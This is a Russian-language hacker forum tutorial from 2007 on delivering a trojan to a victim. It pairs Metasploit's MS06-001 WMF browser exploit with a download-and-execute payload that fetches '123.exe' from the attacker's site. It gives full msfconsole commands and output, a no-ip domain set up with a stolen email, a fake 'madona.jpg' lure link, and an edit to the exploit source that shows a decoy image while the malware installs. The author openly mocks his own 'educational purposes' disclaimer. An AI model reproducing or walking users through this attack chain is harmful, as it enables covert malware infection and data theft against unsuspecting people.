Троянский вирус, как в парить.

 

Привет ламер )

 

В предыдущих статьях я рассказывал как создать и как спрятать троянский вирус.

И так ты создал, спрятал и думаешь а как мне его в парить лоху ? Хммм... Есть много способов и ты о них наверняка уже знаешь… Но я тебе хочу предложить более экзотический способ, более профессиональный способ, который наверняка поможет тебе в будущим занимала чем то эдаким УЖАСНЫМ. Короче ты меня понял. НЕ ТУПИ !

 

------------------------------

Ты когда небуть хотел дать троя своей жертве так чтоб она даже не думала что это что то плохое ? Например вот по такой ссылке > http://madona.zapto.org/madona.jpg ?

Я знаю, ты не только хотел это сделать ты МЕЧТАЛ об этом !!!

Вот на этом предисловие и остановимся. Собственно сегодня мы это и будим делать !

 

------------------------------

Ну как всегда. Что нам нужно ?

Нам нужна так называемая консоль «Metasploit Framework 3» (рус. «МетаСплоит») + нам нужна «плохая программа» (ну в смысле трой, вирус или бот) предлагаю «Pinch» + нужна программа «No-Ip DUC» и регистрация на сайте no-ip.com + нужна голова и желание.

 

Что же такое «Metasploit» ?

Ну начнем с того что же вообще такое «Exploit» (рус. «Сплоит»).

 

-----------

Exploit – это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведёт к повышению привилегий или отказу в обслуживании компьютерной системы. (с) ru.wikipedia.org

 

-----------

Shell-код, код оболочки (англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например '/bin/sh' Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе. (с) ru.wikipedia.org

 

-----------

Metasploit – это пакет имеющий два варианта работы: msfconsole (консольный) и web- интерфейс msfweb. Удобней всегда работать в msfconsole. Это интерфейс командной строки (по типу cmd с минимальным набором команд), имеющий собственное программное окружение и систему команд. (с) antichat.ru

 

-----------

Для чего нам нужна плохая программа ?

)=D БЕС КОММЕНТАРИЕВ !

 

-----------

А для чего нужна тогда программа «No-Ip DUC» и регистрация ?

Это чтобы ссылка выгладила красива. ((http://madona.zapto.org/) за вместо IP адреса)

Вообще скажу так, No-Ip.com предоставляет доменное имя для ДИНОМИЧИСКИХ Ip-адресов (в смысле домен). И предоставляется это БЕСПЛАТНО (смотря какой домен).

А программа «No-Ip DUC» привязывает этот домен к твоему Ip-адресу.

 

------------------------------

Ну всё с теорией покончено ! Давайте же посмотрим что из себя представляет «Metasploit Framework 3» визуально >>>

 

Рис 1.1

 

-----------

Наш «Metasploit Framework 3» имеет 116 Exploit`ов и 99 Shell`ов

	   =[ msf v3.0-beta-dev
+ -- --=[ 116 exploits - 99 payloads
+ -- --=[ 17 encoders - 4 nops
   =[ 17 aux

-----------

 

 

-----------

Наберём команду Help (справка)

 

Рис 1.2

 

Команды >>>

? ---------------------- Help menu (вывод этого хелпа на экран)
Back ----------------- Move back from the current context (переместиться назад от текущего контекста)
Banner --------------- Display an awesome metasploit banner (выводит на экран баннер Metasploit`а (то что выводится в начале))
Cd --------------------- Change the current working directory (смена рабочей директории)
Exit -------------------- Exit the console (выход из консоли)
Help -------------------- Help menu (вывод этого хелпа на экран)
Info --------------------- Displays information about one or more module (Вывести на экран информацию об одном или нескольких модулях)
Irb ----------------------- Drop into irb scripting mode (Упасть (перейти) в irb скриптинг режим)
Jobs --------------------- Displays and manages jobs (Отобразить и управлять задачами)
Load --------------------- Load a framework plugin (Загрузить плагин фрамворка)
Loadpath ---------------- Searches for and loads modules from a path (Поиск путей загруженных модулей)
Quit --------------------- Exit the console (Выход из консоли)
Route ------------------- Route traffic through a session (Маршрут траффа через сеанс)
Save -------------------- Saves the active datastores (Сохранить активную историю данных)
Sessions ---------------- Dump session listings and display information about sessions (Дампит листинг сессий и выводит информацию о них)
Set --------------------- Sets a variable to a value (Устанавливает значение переменной)
Setg -------------------- Sets a global variable to a value (Устанавливает значение глобальной переменной)
Show ------------------- Displays modules of a given type, or all modules (Выводит на экран модули по типу или все модули)
Sleep ------------------- Do nothing for the specified number of seconds (Бездействие столько-то секунд)
Unload ------------------ Unload a framework plugin (Выгрузить плагин фрамворка)
Unset -------------------- Unsets one or more variables (Сбросить одну или более переменных)
Unsetg ------------------- Unsets one or more global variables (Сбросить одну или более глобальных переменных)
Use ------------------------ Selects a module by name (Использовать (выбрать) модуль (эксплоит) по имени)
Version ------------------ Show the console library version number (Показать номер версии фрамворка и консоли)

(с) antichat.ru

 

-----------

Давайте наберём команду show exploits

 

Рис 1.3

 

Мы видим список Exploit`ов… он прекрасен )

 

-----------

Давайте наберём команду show payloads

 

Рис 1.4

 

Мы видим список Shell`ов…

 

-----------

Теперь ты понял что такое команды и консоль. И как они выглядят и как работают.

 

------------------------------

Так. Давай скачаем «Metasploit Framework 3» и установим его.

 

Собственно качаем >>> http://metasploit.com/projects/Framework/msf3/#download

Скачиваем именно:

3.0 Beta 1 framework-3.0-beta-1.exe Windows 2000/XP/2003 (bundled Cygwin) Во избежание каких либо неурядиц ) потому как статья пишется именно под v. 3.0 Beta 1

 

Рис 2.1

 

И постепенно мы переходим к практике…

 

-----------

Скачали ? Устанавливаем именно в C:\Program Files\ по умолчанию. Так будет легче мне с тобой работать дальше )

Вот наш «Metasploit Framework 3» С:\Program Files\Metasploit\Framework3\msfconsole.bat <<<

 

------------------------------

Теперь давай зарегистрируйся на http://no-ip.com <<<

Если ты в албанском (англ.) НУБ. Слушай меня !!!

 

Рис 2.2

 

Жми… Sign-up Now! как показано на рисунке.

И в води все свои не существующие данные, кроме мыла (мыло желательно угнанное (чужое))

 

-----------

Зарегистрировался ? Молодец !

 

Идём дальше…

 

Рис 2.3

 

Нажимаем на «Add»

 

-----------

 

 

-----------

Видим >>>

 

Рис 2.4

 

Выбираем домен (У ТЕБЯ СВОЙ) всё остальное оставляем как есть.

Выбирай бесплатный домен (FREE) нууу а если хочеш можиш и купить домен для своего IP/

 

-----------

После в низу нажимай «Create Host»

И тебе сообщают что доменное имя к акуанту привязано.

 

Осталось тока привязать его к твоему IP адресу )

 

------------------------------

Едем дальше… качай программку «NO-IP DUC» 668K

>>> http://www.no-ip.com/downloads.php?page=win

Нажимай «Download 2.2.1» После нажимай «Download Now» всё.

 

Рис 3.1

 

Скачал ?

 

-----------

Едем, плывём, танцуем (как тебе луче) ДАЛЬШЕ >>>

 

А вот и программка такая маленькая и умная аш глаза радуются ) Ой о чём это я, ах да вот >>>

 

Рис 3.2

 

Ну всё она сама всё сделал за тебя и привязала к твоему IP-адресу домен «madona.zapto.org» (У ТЕБЯ СВОЙ)

Если это не произошло… то кликай на кнопку «Edit» в программе. В води свой логин (мыло) и пароль от ака на no-ip.com (не путать с паролём от мыла).

 

------------------------------

Ну наконец-то - скажешь ты - мы переходим не посредственно к «Metasploit Framework 3»

 

Способ атаки будет таков:

Мы: Windows XP/NT

Он/Она (жерта): Windows XP/NT

 

Такс…

 

Запусти «Metasploit» С:\Program Files\Metasploit\Framework3\msfconsole.bat

Набери: show exploits

 

-----------

Найди строчку:

windows/browser/ms06_001_wmf_setabortproc ------- Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution

 

Рис 4.1

 

ms06_001_wmf_setabortpro <<< Это наш Сплоит для Браузера IE 6 (Internet Explorer) который мы будем использовать.

 

-----------

Теперь набери: show payloads

 

Найди строчку:

windows/download_exec ------- Windows Executable Download and Execute

 

Рис 4.2

 

download_exec <<< Это наш Shell

 

-----------

А вот сейчас мы этот сплоит выберем командой: use [путь/имя_сплоита]

 

Вот так:

msf > use windows/browser/ms06_001_wmf_setabortproc

 

Рис 4.3

 

На рисунке видно что сплоит выбран:

 

msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) >

 

-----------

Командуем info:

 

msf exploit(ms06_001_wmf_setabortproc) > info

 

Видим следующие:

 

   Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
  Version: 3906
  Platform: Windows
Privileged: No
License: Metasploit Framework License v1.0

Provided by:
 hdm <hdm@metasploit.com>
 san <san@xfocus.org>
 O600KO78RUS <O600KO78RUS@unknown.ru>

Available targets:
 Id  Name							 
 --  ----							 
 0   Windows XP/2003/Vista Automatic  

Basic options:
 Name	 Current Setting  Required  Description										  
 ----	 ---------------  --------  -----------										  
 SRVHOST  195.239.203.203  yes	   The local host to listen on.						 
 SRVPORT  8080			 yes	   The local port to listen on.						 
 URIPATH				   no		The URI to use for this exploit (default is random)  

Payload information:
 Space: 1852
 Avoid: 1 characters

Description:
 This module exploits a vulnerability in the GDI library included 
 with Windows XP and 2003. This vulnerability uses the 'Escape' 
 metafile function to execute arbitrary code through the SetAbortProc 
 procedure. This module generates a random WMF record stream for each 
 request.

References:
 http://www.microsoft.com/technet/security/bulletin/MS06-001.mspx
 http://www.securityfocus.com/bid/16074
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-4560
 http://www.osvdb.org/21987
 http://milw0rm.com/metasploit.php?id=111
 http://www.microsoft.com/technet/security/advisory/912840.mspx
 http://wvware.sourceforge.net/caolan/ora-wmf.html
 http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt

 

Строка:

SRVHOST (LHOST) 195.239.203.203 ---- Наш IP-адрес на катором повиснет сплоит. (У ТЕБЯ СВОЙ IP)

SRVPORT (PHOST) 8080 ------------------ Порт на катаром будет работать сплоит.

URIPATH (URIPATH) -------------------------- Главная наверно фича «Metasploit Framework 3»

 

------------------------------

 

 

------------------------------

Настраиваем сплоит

 

Командуем set LHOST ваш.ip.адрес:

 

msf exploit(ms06_001_wmf_setabortproc) > set LHOST 195.239.203.203
LHOST => 195.239.203.203

 

Настроили IP-адерс.

 

-----------

Командуем set URIPATH madona.jpg:

 

 msf exploit(ms06_001_wmf_setabortproc) > set URIPATH madona.jpg
URIPATH => madona.jpg

 

Присвоили значение не полной ссылке «/madona.jpg

 

-----------

Командуем set PAYLOAD windows/download_exec:

 

msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec

 

Прикрутили Shell к нашему Exploit`у

 

------------------------------

Настраиваем Shell

 

Командуем set URL http://ВАШ_САЙТ.ru/123.exe

 

msf exploit(ms06_001_wmf_setabortproc) > set URL http://***********.ru/123.exe
URL => http://***********.ru/123.exe

 

123.exe --- это наша «плохая программа». Спецом заранее залита на ваш хостинг )

 

Если этот Shell не хочет работать т.к. закачивать троя на комп жертве.

То воспользуйтесь более функциональными Shell`ми из этой серии...

 

windows/download_exec ------------ Windows Executable Download and Execute										  
windows/download_exec/bind_tcp --------- Windows Executable Download and Execute, Bind TCP Stager						 
windows/download_exec/find_tag --------- Windows Executable Download and Execute, Find Tag Ordinal Stager				 
windows/download_exec/reverse_http ---- Windows Executable Download and Execute, PassiveX Reverse HTTP Tunneling Stager  
windows/download_exec/reverse_ord_tcp - Windows Executable Download and Execute, Reverse Ordinal TCP Stager			  
windows/download_exec/reverse_tcp ------ Windows Executable Download and Execute, Reverse TCP Stager

Например Shell reverse_tcp может открыть CMD жертвы. Нооо это уже другая история...

 

------------------------------

Всё наш эдакий «экзотический способ» в паривания троя ГОТОВ !!!

 

Командуем exploit:

 

Рис 4.4

 

msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Using URL: http://195.239.203.203:8080/madona.jpg
[*] Server started.[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >

 

За вместо IP-адреса

http://195.239.203.203:8080/madona.jpg

мы делаем.

http://madona.zapto.org:8080/madona.jpg

тоесь как делаем ручками, ручками…

 

------------------------------

Всё можно найти лоха и дать ему ссылку.

После чего к нему на комп загрузится .wmf файл ) а после и ваш трой и запустиЦо.

 

------------------------------

Но эмммм… есть одна небольшая проблемка… )

Когда человек откроет эту страничку к сожалению он не увидит фотки и может сразу закрыть окно Браузера.

Это не хорошо т.к. Этот сплоит на переполнение и чтобы всё начело работать надо не которое время подождать ну примерно секунд 10. А в это время пока идут 10 секунд лох видит в Браузере надпись «One second please...».

Это очень подозрительно вам так не кажется ?

 

-----------

Как же от этого избавится…

Очень, очень просто… надо найти исходник этого сплоита и изменить его. )

 

Исходник >>>

 

C:\Program Files\Metasploit\Framework3\home\framework\modules\exploits\windows\browser\ms06_001_wmf_setabortproc.rb

 

Открываем это сплоит через Word (обычный (не офис))

Ищем строку:

html =
"<html><meta http-equiv='refresh' content='0; URL=" +
get_resource + '/' + 
Rex::Text.rand_text_alphanumeric(rand(80)+16) + 
".#{ext}'><body>One second please...</body></html>"

-----------

Если вы хоть малость понимаете в HTML то вы уже просекли в чем тут дела )

Ну а если вы не парите даже в HTML тоооо… ну что же и такое бывает ) мы все люди.

 

html =
"<html><meta http-equiv='refresh' content='0; URL=" +
get_resource + '/' + 
Rex::Text.rand_text_alphanumeric(rand(80)+16) + 
".#{ext}'><body><center><img src="http://ВАШ_САЙТ/ВАША_ФОТКА.jpg"></img></center></body></html>"

 

http://ВАШ_САЙТ/ВАША_ФОТКА.jpg наверное вы уже п0нели что луче сделать какунеть фотку голой мадонны аля 80-ых…

 

-----------

Теперь лох будет любоваться на соски мадонны, а в это время к нему будет потихоньку проникать «ваша плохая программа» ) в премом смысле…

 

 

------------------------------

Ну всё желаю всем удачи и т.д. И не попадайтесь…

 

Напомню что типа мол )

Автор (тоесть Я) предоставил этот материал только для ознакомительных целей.

За использование данного материала автор ответственности не несет.

 

Copyright the text and images by NARCOMAN © 2007

------------------------------

 

Но на самом деле мы то знаем что это всё ПИЗД*** И щас ты схватиш этот грёбаный МетоСплоит и будете хаКать весь инет…

-----------

В следующих статях я незнаю что я буду писать (

Попросите меня мож чё придумаем )

-----------

http://forum.antichat.ru/threadnav24465-1-10-metasploit.html <<< сплоиты для IE.